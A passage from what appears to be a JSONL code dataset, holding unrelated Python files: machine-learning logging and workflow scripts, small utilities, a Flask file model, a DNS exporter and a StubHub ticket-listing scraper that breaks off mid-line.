{"seq_id":"83856110","text":"\"\"\" Tensorboard interface to enable logging of MDRNN/VAE training data \"\"\"\n# Copyright (c) 2020, - All Rights Reserved\n# This file is part of the Evolutionary Planning on a Learned World Model thesis.\n# Unauthorized copying of this file, via any medium is strictly prohibited without the consensus of the authors.\n# Written by Thor V.A.N. Olesen & Dennis T.T. 
Nguyen .\nimport io\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nfrom torchvision.utils import make_grid\nfrom torch.utils.tensorboard import SummaryWriter\nfrom utility.logging.base_logger import BaseLogger\n\n\nclass ModelTrainingLogger(BaseLogger):\n\n def __init__(self, is_logging):\n super().__init__(is_logging)\n self._test_writer = None\n self._train_writer = None\n self.start_time = None\n\n def start_log_training(self, name, model, dataloader, save_input_image=True):\n if not self._is_logging:\n return\n dataiter = iter(dataloader)\n frames = dataiter.next()\n self.start_log(name)\n if save_input_image:\n grid_of_images = make_grid(frames)\n self._train_writer.add_image(tag=f'{name}_training_input_example', img_tensor=grid_of_images, global_step=0)\n self._train_writer.add_graph(model, frames)\n self.start_time = time.time()\n\n def start_log_training_minimal(self, name, is_vae=False):\n if not self._is_logging:\n return\n self.start_log(name, is_vae)\n self.start_time = time.time()\n\n def log_average_loss_per_epoch(self, name, loss, epoch, is_train):\n\n title = f\"{name} - Average Total Loss/per_epoch\"\n self.log_train_test(title, loss, epoch, is_train)\n\n def log_reward_loss_per_epoch(self, name, loss, epoch, is_train):\n title = f\"{name} - Reward MSE Loss/per_epoch\"\n self.log_train_test(title, loss, epoch, is_train)\n\n def log_baseline_reward_loss_per_epoch(self, name, loss, epoch, is_train):\n title = f\"{name} - Reward Baseline MSE Loss/per_epoch\"\n self.log_train_test(title, loss, epoch, is_train)\n\n def log_terminal_loss_per_epoch(self, name, loss, epoch, is_train):\n title = f\"{name} - Terminals BCE Loss/per_epoch\"\n self.log_train_test(title, loss, epoch, is_train)\n\n def log_next_latent_loss_per_epoch(self, name, loss, epoch, is_train):\n title = f\"{name} - GMM next latent Loss/per_epoch\"\n self.log_train_test(title, loss, epoch, is_train)\n\n def log_average_loss_per_batch(self, name, loss, batch, is_train):\n title = f\"{name} - Average Total Loss/per_batch\"\n self.log_train_test(title, loss, batch, is_train)\n\n def log_reward_loss_per_batch(self, name, loss, batch, is_train):\n title = f\"{name} - Reward MSE Loss/per_batch\"\n self.log_train_test(title, loss, batch, is_train)\n\n def log_baseline_reward_loss_per_batch(self, name, loss, batch, is_train):\n title = f\"{name} - Reward Baseline MSE Loss/per_batch\"\n self.log_train_test(title, loss, batch, is_train)\n\n def log_reward_baseline_value(self, name, model, baseline_reward, num_files):\n self._train_writer.add_text(tag=f'{name} - baseline_reward/{model}', text_string=f'Baseline reward: {baseline_reward}\\n'\n f'Reward count: {num_files}\\n')\n\n def log_reward_baseline_losses(self, name, model, train_loss, test_loss):\n self._train_writer.add_text(tag=f'{name} - baseline_reward/{model}', text_string=f'Baseline train loss: {train_loss}\\n'\n f'Baseline test loss: {test_loss}')\n\n def log_terminal_loss_per_batch(self, name, loss, batch, is_train):\n title = f\"{name} - Terminals BCE Loss/per_batch\"\n self.log_train_test(title, loss, batch, is_train)\n\n def log_next_latent_loss_per_batch(self, name, loss, batch, is_train):\n title = f\"{name} - GMM next latent Loss/per_batch\"\n self.log_train_test(title, loss, batch, is_train)\n\n def log_vae_random_constructions(self, images, epoch):\n if not self._is_logging:\n return\n grid = make_grid(images)\n self._test_writer.add_image(f'vae_random_latent_vectors_construction', grid, global_step=epoch)\n\n 
def log_vae_reconsstructions(self, targets, predictions, epoch, is_train):\n if not self._is_logging:\n return\n target_grid = make_grid(targets)\n predictions = make_grid(predictions)\n\n if is_train:\n self._train_writer.add_image(f'vae_reconstructions/train_targets', target_grid, global_step=epoch)\n self._train_writer.add_image(f'vae_reconstructions/train_predictions', predictions, global_step=epoch)\n else:\n self._test_writer.add_image(f'vae_reconstructions/test_targets', target_grid, global_step=epoch)\n self._test_writer.add_image(f'vae_reconstructions/test_predictions', predictions, global_step=epoch)\n\n def log_train_test(self, tag, loss, epoch, is_train):\n if not self._is_logging:\n return\n if is_train:\n self._train_writer.add_scalar(tag, loss, epoch)\n else:\n self._test_writer.add_scalar(tag, loss, epoch)\n\n def log_batch_sample(self, samples, batch_idx, is_train):\n # Save the plot to a PNG in memory and prevent display\n image = self._make_batch_image_grid(samples)\n if is_train:\n self._train_writer.add_image(f\"Batch_train_samples\", image, dataformats='HWC', global_step=batch_idx)\n else:\n self._test_writer.add_image(f\"Batch_test_samples\", image, dataformats='HWC', global_step=batch_idx)\n self.commit_log()\n\n def _make_batch_image_grid(self, samples):\n current_frame_subplot = 1\n num_samples = len(samples['input_frames'])\n\n figure = plt.figure(figsize=(15, 15))\n for i in range(num_samples):\n self._add_to_image_grid('Input\\n'\n f'action: {list(samples[\"input_actions\"][i])}\\n', current_frame_subplot, samples['input_frames'][i], num_samples)\n current_frame_subplot += 1\n self._add_to_image_grid(f'Prediction\\n'\n f'reward_pred: {samples[\"pred_rewards\"][i].item()}\\n'\n f'terminal_pred: {samples[\"pred_terminals\"][i].item()}',\n current_frame_subplot, samples['pred_frames'][i], num_samples)\n current_frame_subplot += 1\n self._add_to_image_grid('Target\\n'\n f'reward_target: {samples[\"target_rewards\"][i].item()}\\n'\n f'terminal_target: {samples[\"target_terminals\"][i].item()}', current_frame_subplot, samples['target_frames'][i], num_samples)\n current_frame_subplot += 1\n\n return self._plot_to_image(figure)\n\n def _plot_to_image(self, figure):\n # Save the plot to a PNG in memory.\n buf = io.BytesIO()\n plt.savefig(buf, format='png')\n plt.close(figure)\n buf.seek(0)\n pil_img = Image.open(buf).convert('RGB')\n image = np.array(pil_img)\n return image\n\n def _add_to_image_grid(self, title, index, image, num_samples):\n plt.subplot(num_samples, 3, index, title=title) # 3 = input, pred, target\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n plt.imshow(image)\n\n def end_log_training(self, name):\n if not self._is_logging:\n return\n elapsed_time = (time.time() - self.start_time)/60\n self._test_writer.add_text(tag=f'{name} - Total train time', text_string=f'Minutes: {elapsed_time}')\n self.end_log()\n\n def start_log(self, name, is_vae=False):\n if not self._is_logging:\n return\n self._test_writer = SummaryWriter(log_dir=f'{self.log_dir_root}/test/{name}')\n self._train_writer = SummaryWriter(log_dir=f'{self.log_dir_root}/train/{name}')\n\n def commit_log(self):\n if not self._is_logging:\n return\n self._train_writer.flush()\n self._test_writer.flush()\n\n def end_log(self):\n if not self._is_logging:\n return\n self.commit_log()\n self._train_writer.close()\n 
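`_plot_to_image` above is the usual trick for logging matplotlib figures to TensorBoard: render the figure to an in-memory PNG, then decode it back into an HWC numpy array. A standalone version of the round-trip:

import io
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image

def figure_to_array(figure):
    # Render the current matplotlib figure to an in-memory PNG and decode it
    # to an HWC uint8 array, suitable for add_image(..., dataformats='HWC').
    buf = io.BytesIO()
    plt.savefig(buf, format='png')
    plt.close(figure)
    buf.seek(0)
    return np.array(Image.open(buf).convert('RGB'))

fig = plt.figure()
plt.plot([0, 1], [0, 1])
print(figure_to_array(fig).shape)  # (height, width, 3)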
self._test_writer.close()\n","sub_path":"utility/logging/model_training_logger.py","file_name":"model_training_logger.py","file_ext":"py","file_size_in_byte":8459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"181394741","text":"#!/usr/bin/env python3\n#\n# Copyright 2018 - The Android Open Source Project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\nimport unittest\n\nfrom tests.controllers.sl4a_lib import rpc_client_test\nfrom tests.controllers.sl4a_lib import rpc_connection_test\nfrom tests.controllers.sl4a_lib import sl4a_manager_test\nfrom tests.controllers.sl4a_lib import sl4a_session_test\n\n\ndef compile_suite():\n test_classes_to_run = [\n rpc_client_test.RpcClientTest,\n rpc_connection_test.RpcConnectionTest,\n sl4a_manager_test.Sl4aManagerFactoryTest,\n sl4a_manager_test.Sl4aManagerTest,\n sl4a_session_test.Sl4aSessionTest,\n ]\n loader = unittest.TestLoader()\n\n suites_list = []\n for test_class in test_classes_to_run:\n suite = loader.loadTestsFromTestCase(test_class)\n suites_list.append(suite)\n\n big_suite = unittest.TestSuite(suites_list)\n return big_suite\n\n\nif __name__ == \"__main__\":\n # This is the entry point for running all SL4A Lib unit tests.\n runner = unittest.TextTestRunner()\n results = runner.run(compile_suite())\n sys.exit(not results.wasSuccessful())\n","sub_path":"tools/test/connectivity/acts/framework/tests/controllers/sl4a_lib/test_suite.py","file_name":"test_suite.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"406744666","text":"#! 
/usr/bin/env python\n\nfrom prometheus_client import start_http_server, Gauge\nimport dns.resolver\nimport time\n\n# ns_target can be a public resolver or authoritative nameserver\nns_target = '8.8.8.8'\nquery_target = 'tools.jcdev.org'\n\nresolver = dns.resolver.Resolver()\nresolver.nameservers = [ns_target]\n\nquery_time = Gauge('query_time_seconds', 'DNS query total time taken', ['hostname'])\n\ndef dns_timer():\n stime = time.time()\n answers = resolver.query(query_target, 'A')\n etime = time.time()\n\n query_time.labels(query_target).set(etime - stime)\n time.sleep(30)\n\nif __name__ == '__main__':\n start_http_server(9181)\n while True:\n dns_timer()\n","sub_path":"dns-exporter.py","file_name":"dns-exporter.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} {"seq_id":"423674260","text":"# ROUTINES FOR ASKING THE USER FOR INPUT\n\n# Library and module imports\nimport sanity2\n\n# Function definitions\ndef kysy_liukuluku(kysymys, alaraja, ylaraja):\n \"\"\"Asks the user for a float or an integer and checks that the input has the right type and magnitude\n\n Args:\n kysymys (str): the question presented to the user\n alaraja (float): smallest allowed value\n ylaraja (float): largest allowed value\n\n Returns:\n float: the value entered by the user, as a float\n \"\"\"\n # Keep asking the user until a sensible value is received\n luku = 0\n tapahtui_virhe = True\n\n while tapahtui_virhe == True:\n\n # Present the question given as a parameter and store the answer (a string) in a variable\n vastaus_str = input(kysymys + ' ')\n\n # Check that the input is sensible; error info and the value are stored in the list variable tulokset\n tulokset = sanity2.liukuluvuksi(vastaus_str)\n\n # Check whether the error code is 0, and store the value in the variable vastaus\n if tulokset[0] == 0:\n vastaus = tulokset[2]\n\n # Perform the range check; error info goes into the variable tarkistusviesti\n tarkistusviesti = sanity2.rajatarkistus(vastaus, alaraja, ylaraja)\n \n # Check whether the value is within the allowed range by inspecting the error code\n if tarkistusviesti[0] == 0:\n tapahtui_virhe = False\n luku = vastaus\n\n else:\n # If the range check's error code is not 0, print the error message\n print(tarkistusviesti[1])\n\n # If the float check's error code is not 0, print the error message \n else:\n print(tulokset[1])\n\n return luku\n\n\n# Temporary tests used during development\nif __name__ == '__main__':\n vastaus = kysy_liukuluku('Anna luku', 100, 200)\n print(vastaus)\n \n","sub_path":"kysymys.py","file_name":"kysymys.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} {"seq_id":"576251183","text":"from db import db\nfrom flask import send_file\nfrom datetime import datetime\nfrom models.asignatura import Asignatura\nimport mongoengine_goodjson as gj\nimport os\nfrom werkzeug.utils import secure_filename\n\n\nclass Archivo(gj.Document):\n nombre = db.StringField(verbose_name=\"Nombre Archivo\", max_length=200)\n path = db.StringField(verbose_name=\"Path\", max_length=200)\n asignatura = db.ReferenceField(Asignatura)\n fecha = db.DateTimeField(default=datetime.now)\n meta = {'strict': False}\n\n def __str__(self):\n return self.nombre\n\n def to_dict(self):\n return {\n \"id\": str(self.id),\n \"nombre\": self.nombre,\n \"path\": self.path,\n \"asignatura\": self.asignatura.to_dict(),\n \"fecha\": self.fecha.strftime(\"%Y/%m/%d %H:%M:%S\")\n }\n\n 
# literally, these class methods are the equivalent of services in Java\n @classmethod\n def upload(cls, base_path, new_file, asignatura_id):\n asignatura = Asignatura.objects(id=asignatura_id).first()\n folder = base_path + str(asignatura['id'])\n if not os.path.exists(folder):\n os.mkdir(folder)\n file_name = secure_filename(new_file.filename)\n path = os.path.join(folder, file_name)\n new_file.save(path)\n if os.path.exists(path):\n archivo = Archivo(nombre=file_name, path=path,\n asignatura=asignatura)\n archivo.save()\n return archivo.to_dict()\n \n @classmethod\n def get_all_by_asignatura(cls, asignatura_id):\n archivos = Archivo.objects(asignatura = asignatura_id).all()\n result_list=[]\n for archivo in archivos:\n result_list.append(archivo.to_dict())\n return result_list\n\n @classmethod\n def download(cls, archivo_id):\n archivo = Archivo.objects(id=archivo_id).first()\n print(60*\"*\", archivo.path)\n return send_file(archivo.path, as_attachment=True, attachment_filename=archivo.nombre + \"\")\n\n @classmethod\n def erase(cls, archivo_id):\n try:\n archivo = Archivo.objects(id=archivo_id).first()\n os.remove(archivo.path)\n archivo.delete()\n return \"Archivo eliminado\"\n except Exception as e:\n print(str(e))\n return \"No se pudo eliminar el archivo\"\n \n @classmethod\n def get_all(cls):\n archivos = Archivo.objects().all()\n result_list = []\n for archivo in archivos:\n result_list.append(archivo.to_dict())\n return result_list","sub_path":"models/archivo.py","file_name":"archivo.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} {"seq_id":"646244686","text":"from inferelator import utils\nfrom inferelator import workflow\nfrom inferelator.distributed.inferelator_mp import MPControl\nfrom inferelator.preprocessing import single_cell\nfrom inferelator.regression.bbsr_multitask import BBSRByTaskRegressionWorkflow\n\nN_CORES = 100\nINPUT_DIR = '/mnt/ceph/users/cjackson/inferelator/data/yeast'\nOUTPUT_DIR = '/mnt/ceph/users/cjackson/inferelator/v031/'\nCONDA_ACTIVATE_PATH = '~/.local/anaconda3/bin/activate'\nYEASTRACT_PRIOR = \"YEASTRACT_20190713_BOTH.tsv\"\nTF_NAMES = \"tf_names_gold_standard.txt\"\nYEASTRACT_TF_NAMES = \"tf_names_yeastract.txt\"\n\n\ndef start_mpcontrol_dask(n_cores=N_CORES):\n utils.Debug.set_verbose_level(1)\n MPControl.set_multiprocess_engine(\"dask-cluster\")\n MPControl.client.minimum_cores = n_cores\n MPControl.client.maximum_cores = n_cores\n MPControl.client.walltime = '48:00:00'\n MPControl.client.add_worker_env_line('module load slurm')\n MPControl.client.add_worker_env_line('module load gcc/8.3.0')\n MPControl.client.add_worker_env_line('source ' + CONDA_ACTIVATE_PATH)\n MPControl.client.cluster_controller_options.append(\"-p ccb\")\n MPControl.connect()\n\n\nif __name__ == '__main__':\n start_mpcontrol_dask(100)\n\n for seed in range(42, 52):\n worker = workflow.inferelator_workflow(regression=BBSRByTaskRegressionWorkflow, workflow=\"amusr\")\n worker.set_file_paths(input_dir=INPUT_DIR, output_dir=OUTPUT_DIR, gold_standard_file=\"gold_standard.tsv\",\n gene_metadata_file=\"orfs.tsv\", priors_file=YEASTRACT_PRIOR,\n tf_names_file=YEASTRACT_TF_NAMES)\n worker.set_file_properties(gene_list_index=\"SystematicName\")\n worker.set_task_filters(target_expression_filter=\"union\", regulator_expression_filter=\"intersection\")\n worker.set_run_parameters(num_bootstraps=5, random_seed=seed)\n worker.set_crossvalidation_parameters(split_gold_standard_for_crossvalidation=True, 
cv_split_ratio=0.2)\n\n        worker.append_to_path('output_dir', \"fig5d_mtl_bbsr_seed_\" + str(seed))\n\n        # Jackson single cell task\n        task = worker.create_task(task_name=\"Jackson_2019\",\n                                  expression_matrix_file=\"103118_SS_Data.tsv.gz\",\n                                  expression_matrix_columns_are_genes=True,\n                                  extract_metadata_from_expression_matrix=True,\n                                  expression_matrix_metadata=['Genotype', 'Genotype_Group', 'Replicate', 'Condition', 'tenXBarcode'],\n                                  workflow_type=\"single-cell\",\n                                  count_minimum=0.05,\n                                  tasks_from_metadata=True,\n                                  meta_data_task_column=\"Condition\")\n        task.add_preprocess_step(single_cell.log2_data)\n\n        worker.run()\n        del worker\n","sub_path":"inferelator_0_3_1/singlecell_mtl_bbsr.py","file_name":"singlecell_mtl_bbsr.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"628791508","text":"from blockchain import blockexplorer\r\n\r\n##############################\r\n\r\nclass BitcoinAddress:\r\n    \"\"\"\r\n    This is a class for Bitcoin addresses with all relevant data stored\r\n    \"\"\"\r\n    def __init__(self, address, n_tx, total_received, total_sent, balance, last_tx_date, data_created_date, comment, transactions=None):\r\n        \r\n        self.address = address\r\n        self.n_tx = n_tx\r\n        self.total_received = total_received\r\n        self.total_sent = total_sent\r\n        self.balance = balance\r\n        self.last_tx_date = last_tx_date\r\n        self.data_created_date = data_created_date\r\n        self.comment = comment\r\n        self.transactions = transactions\r\n    \r\n    def check_for_update(self, last_tx_time_old, address):\r\n        api_address = blockexplorer.get_address(address)\r\n        api_transactions = api_address.transactions\r\n        last_tx_time = api_transactions[0].time # index 0 is the most recent transaction\r\n        if last_tx_time_old < last_tx_time:\r\n            return True\r\n        else:\r\n            return False\r\n\r\n##############################\r\n\r\ndef build(address, comment=\"\"):\r\n    # Builds the object with given attributes\r\n    \r\n    api_address = blockexplorer.get_address(address)\r\n    api_transactions = api_address.transactions\r\n    n_tx = api_address.n_tx\r\n    total_received = api_address.total_received / 100000000\r\n    total_sent = api_address.total_sent / 100000000\r\n    balance = api_address.final_balance / 100000000\r\n    if api_transactions:\r\n        last_tx_date = api_transactions[0].time\r\n    else:\r\n        last_tx_date = 0\r\n    #last_tx_date = datetime.utcfromtimestamp(api_transactions[-1].time).strftime('%Y-%m-%d %H:%M:%S')\r\n    data_created_date = 0\r\n    final_object = BitcoinAddress(address, n_tx, total_received, total_sent, balance, last_tx_date, data_created_date, comment, transactions=api_transactions)\r\n    return final_object\r\n","sub_path":"Blockmole/app/blockchain.py","file_name":"blockchain.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"227278452","text":"import glob\nimport numpy as np\nimport cv2\nimport pdb\n\ncanvas = np.zeros((384, 384, 3))\n\nimg = np.zeros((9, 128, 128, 3))\n\nidx = 0\nfor sample in glob.glob('./*.png'):\n    img[idx, :, :, :] = cv2.imread(sample)\n    idx += 1\n\n#pdb.set_trace()\n\nidx = 0\nfor i in range (3):\n    i = i * 128\n    for j in range (3):\n        j = j * 128\n        #filename = './logs/dataset=wikiart,isCan=True,lr=0.0001,imsize=128,batch_size=35/003/samples/crop/{0}_{1}_{2}.png'.format(CAN_sample[-13:-4] ,i, j)\n        #print (filename)\n        #img = cv2.imread(sample)\n        canvas[i:i+128, j: j+128,:] = img[idx, :, :, :]\n        #cv2.imwrite(filename ,img[i:i+128, j: j+128,:]) \n        idx += 1\n#print 
(np.shape(canvas))\n#pdb.set_trace()\ncv2.imwrite('collect.png' , canvas)\n","sub_path":"samples/wcan/make_9_9.py","file_name":"make_9_9.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"470082566","text":"# BOJ 11725\nimport sys\nfrom collections import deque\n\ninput = sys.stdin.readline\n\nN = int(input()) # of nodes\n# N = 7\np = {}\nQ = deque([1]) # default root\n\nMc = [list(map(int, input().split())) for _ in range(N-1)] # group of linked nodes\n# Mc = [[1, 6], [6, 3], [3, 5], [4, 1], [2, 4], [4, 7]]\nMct = [list(x) for x in zip(*Mc)]\nidx = 0\nGraph = {}\nfor _ in range(1,N+1):\n Graph[_] = []\n\nfor _ in range(N-1):\n x, y = Mc[_]\n Graph[x].append(y)\n Graph[y].append(x)\n\nwhile Q:\n pa_node = Q.popleft()\n for ch_node in Graph[pa_node]:\n p[ch_node] = pa_node\n tdx = Graph[ch_node].index(pa_node)\n Graph[ch_node].pop(tdx)\n Q.append(ch_node)\n\nfor _ in range(2, N+1):\n print(p[_])","sub_path":"TreeParent.py","file_name":"TreeParent.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"335653424","text":"#!/software/anaconda3/2020.07/bin/python\n#SBATCH -A action -p action \n#SBATCH -o output.log\n#SBATCH --mem-per-cpu=12GB\n#SBATCH -t 10:00:00\n#SBATCH -n 1\n#SBATCH -N 1\nimport numpy as np\nfrom multiprocessing import Pool\nimport time , sys, os\nsys.path.append(os.popen(\"pwd\").read().replace(\"\\n\",\"\"))\nimport SM \nt0 = time.time()\nprint ()\n#---------------------------- SBATCH ---------------------------------------------------\nsbatch = [i for i in open('parallel.py',\"r\").readlines() if i[:10].find(\"#SBATCH\") != -1 ]\ncpu = int(sbatch[-2].split()[-1].replace(\"\\n\",\"\")) #int(os.environ['SLURM_JOB_CPUS_PER_NODE'])\nnodes = int(sbatch[-1].split()[-1].replace(\"\\n\",\"\"))\n\nprint (os.environ['SLURM_JOB_NODELIST'], os.environ['SLURM_JOB_CPUS_PER_NODE'])\nprint (f\"nodes : {nodes} | cpu : {cpu}\")\nprocs = cpu * nodes\n#----------------------------------\n#----------------------------------\ntry:\n print (sys.argv[1])\n print (sys.argv[2])\n print (sys.argv[3])\n R = np.linspace(float(sys.argv[1]),float(sys.argv[2]),int(sys.argv[3]))\nexcept:\n print (f\"Default Settings\")\n R = np.linspace(-4,4,24*8)\nwith Pool(1) as p:\n #------ Arguments for each CPU--------\n args = []\n for j in range(1):\n par = SM.param() \n args.append(par)\n #-------- parallelization --------------- \n result = p.map(SM.Hel, args)\n #----------------------------------------\nt2 = time.time() - t0 \nprint (f\"Time taken: {t2} s\")\nprint (f\"Time for each point: {t2/len(R)} s\")\n#------- Gather -----------------------------\nµ0, E0, _ = result[0]\nsh = len(µ0.flatten())\nµ = np.zeros( (sh+1 , len(R)) )\nE = np.zeros((len(E0)+1, len(R)) )\ndij = np.zeros((len(E0)**2+1, len(R)) )\nfor Ri in range(len(R)):\n µ[1:,Ri] = result[Ri][0].flatten()\n E[1:,Ri] = result[Ri][1].flatten()\n dij[1:,Ri] = result[Ri][2].flatten()\n # save R\n µ[0,Ri], E[0,Ri], dij[0,Ri] = R[Ri], R[Ri], R[Ri]\n \n#--------------------------------------------\nnp.savetxt(\"µ.txt\", µ.T)\nnp.savetxt(\"E.txt\", E.T)\nnp.savetxt(\"dij.txt\", dij.T)","sub_path":"double_well_01/Hm/parallel.py","file_name":"parallel.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"592708954","text":"import requests\nimport json\nimport re\nimport 
base64\nimport pandas as pd\nimport numpy as np\nfrom time import sleep\nimport datetime\n\nclass StubHub_Scrape(object):\n\n    # Initialize class\n    def __init__(self, sleep_time=6, test_mode = False,\n                 scrape_date = 'today',\n                 events_raw = None, inventory_raw = None):\n\n        # Set the amount of time to sleep after each call\n        self.__sleep_time = sleep_time\n\n        # Store test mode indicator\n        self.__test_mode = test_mode\n\n        # Store date of initialization or user-entered date string\n        self.scrape_date = datetime.datetime.now().strftime('%Y_%m_%d') if scrape_date == 'today'\\\n            else scrape_date\n\n        # Store the query headers... initialize as none\n        self.__headers = None\n\n        # Save the events dataframe... initialize as none\n        self._events_raw = events_raw\n        self.events = None\n\n        # Save the listings dataframe... initialize as none\n        self._inventory_raw = inventory_raw\n        self.tickets = None\n\n        # Set the list of cities we are searching for\n        city_list = ['San Francisco', 'Oakland', 'Berkeley', 'San Jose',\n                     'New York', 'Brooklyn', 'Bronx', 'Flushing', 'East Rutherford',\n                     'Washington, DC', 'Vienna',\n                     'Chicago', 'Rosemont', 'Evanston',\n                     'Los Angeles', 'Hollywood', 'West Hollywood', 'Pasadena',\n                     'Boston', 'Medford']\n        self.__city_list = '\"' + '\" |\"'.join(city_list) + '\"'\n\n\n    # Method to generate headers with authentication\n    def _gen_auth_header_(self):\n\n        # Get credentials from txt file\n        with open('./passwords.txt') as passwords:\n            text = passwords.readlines()\n\n        app_token = re.search(\"'.*\", text[0]).group().replace(\"'\", \"\")\n        consumer_key = re.search(\"'.*\", text[2]).group().replace(\"'\", \"\")\n        consumer_secret = re.search(\"'.*\", text[3]).group().replace(\"'\", \"\")\n        stubhub_username = re.search(\"'.*\", text[5]).group().replace(\"'\", \"\")\n        stubhub_password = re.search(\"'.*\", text[6]).group().replace(\"'\", \"\")\n\n\n        # Generate and encode token\n        combo = consumer_key + ':' + consumer_secret\n        basic_authorization_token = base64.b64encode(combo.encode('utf-8'))\n\n        # Build request header\n        headers = {\n            'Content-Type':'application/x-www-form-urlencoded',\n            'Authorization':'Basic '+basic_authorization_token.decode('utf-8')}\n\n        # Build request body for authentication\n        body = {\n            'grant_type':'password',\n            'username':stubhub_username,\n            'password':stubhub_password,\n            'scope': 'PRODUCTION'}\n\n        # Make request for authentication\n        url = 'https://api.stubhub.com/login'\n        r = requests.post(url, headers=headers, data=body)\n        print('authentication: {}'.format(r.status_code))\n\n        # If authentication worked, parse the response object\n        if r.status_code == 200:\n            # Extract access token and user key\n            token_response = r.json()\n            access_token = token_response['access_token']\n            user_GUID = r.headers['X-StubHub-User-GUID']\n\n        # Otherwise, raise error\n        else:\n            print('authentication failed!')\n            raise RuntimeError('authentication failed')\n\n        # Add auth token to headers\n        headers['Authorization'] = 'Bearer ' + access_token\n        headers['Accept'] = 'application/json'\n        headers['Accept-Encoding'] = 'application/json'\n\n        # Save header with auth\n        self.__headers = headers\n\n        # Take a rest!\n        sleep(self.__sleep_time)\n\n\n    # Method to check whether headers have been generated;\n    ## generates headers if not\n    def _verify_or_gen_auth_(self):\n        if self.__headers is None:\n            self._gen_auth_header_()\n        else:\n            pass\n\n\n    # Method to get raw events list in dict form\n    def _get_events_raw(self):\n        self._verify_or_gen_auth_()\n\n        # Define events url and query params\n        events_url = 'https://api.stubhub.com/search/catalog/events/v3'\n        
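# The search endpoint is paged: 'start' is a row offset and 'rows' the page size, so each request below pulls one 500-row page of results\n        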
params = {'city': self.__city_list, 'q': 'concert', 'sort': 'id',\n 'start': 0, 'rows': 500, 'fieldList': '*,ticketInfo'}\n\n # Run the first request; get the total number of events\n events_r = requests.get(events_url, headers = self.__headers, params = params).json()\n n_found = events_r['numFound']\n print('Got first page of events. Found {} total events.'.format(n_found))\n\n # Start collecting the event response objects; mark with the datetime collected\n events = events_r['events']\n list(map(lambda i: i.update({'dt_accessed': str(datetime.datetime.now())}), events))\n\n\n # Take a rest! Then, get ready for the next request\n sleep(self.__sleep_time)\n params['start'] += 500\n\n # Run a loop through search results and collect\n while params['start'] < n_found:\n\n # Get results, mark with dt, and store\n events_r = requests.get(events_url, headers = self.__headers, params = params).json()['events']\n list(map(lambda i: i.update({'dt_accessed': str(datetime.datetime.now())}), events_r))\n events.extend(events_r)\n print('Got events {} through {}'.format(params['start'], params['start'] + 500))\n\n # Increment through pages; sleep before moving on\n params['start'] += 500\n sleep(self.__sleep_time)\n\n # Escape the while loop after two calls if in test mode\n if self.__test_mode and params['start']>1000:\n print('No more events gathering... test mode!')\n break\n\n print('Got events!')\n\n # Save raw events object\n self._events_raw = events\n\n\n\n def _parse_events(self):\n\n print('Parsing events.')\n\n # Turn events list into a dataframe and remove duplicate events\n events_df = pd.DataFrame(self._events_raw)\n events_df = events_df.drop_duplicates(subset='id')\n\n # Remove parking passes\n parking_passes = events_df.name.apply(lambda n:\n re.search('parking passes only', n.lower()) != None)\n events_df = events_df[~parking_passes]\n\n # Extract event category\n events_df['category'] = events_df.categoriesCollection.apply(lambda x: x[0]['name'])\n\n # Boolean for event parking\n events_df['event_parking'] = events_df.eventAttributes.notna()\n\n # Event geo -- get the most detailed category\n events_df['geos'] = events_df.geos.apply(lambda x: x[-1]['name'])\n\n # Generate event performers dataframe\n events_df['performersCollection'] = events_df.performersCollection.fillna('none')\n events_df.apply(lambda event: None if event['performersCollection'] == 'none'\n else\n [perf.update({'event_id': event['id'],\n 'dt_accessed': event['dt_accessed']})\n for perf in event['performersCollection']], axis=1)\n events_perf = pd.DataFrame(\n events_df.loc[events_df['performersCollection'] != 'none', 'performersCollection'].\n apply(pd.Series).stack().tolist())\n events_perf = events_perf.rename(index=str, columns={'id': 'performer_id', 'name': 'performer_name'})\n events_perf = events_perf.drop(['seoURI', 'webURI'], axis=1, errors='ignore')\n\n # Generate event score dataframe\n events_scores = events_df.loc[:, ['id', 'score', 'dt_accessed']]\n events_scores['date'] = self.scrape_date\n events_scores = events_scores.rename(index=str, columns={'id': 'event_id'})\n\n # Generate event ticket summary dataframe\n ## Add the event id and dt accessed to the dictionary\n events_df['ticketInfo'] = events_df.ticketInfo.fillna('none')\n events_df.apply(lambda event: None if event['ticketInfo'] == 'none'\n else event['ticketInfo'].update(\n {'event_id': event['id'],\n 'dt_accessed': event['dt_accessed']})\n , axis=1)\n events_ticket_summary = events_df[events_df.ticketInfo.notnull()].\\\n 
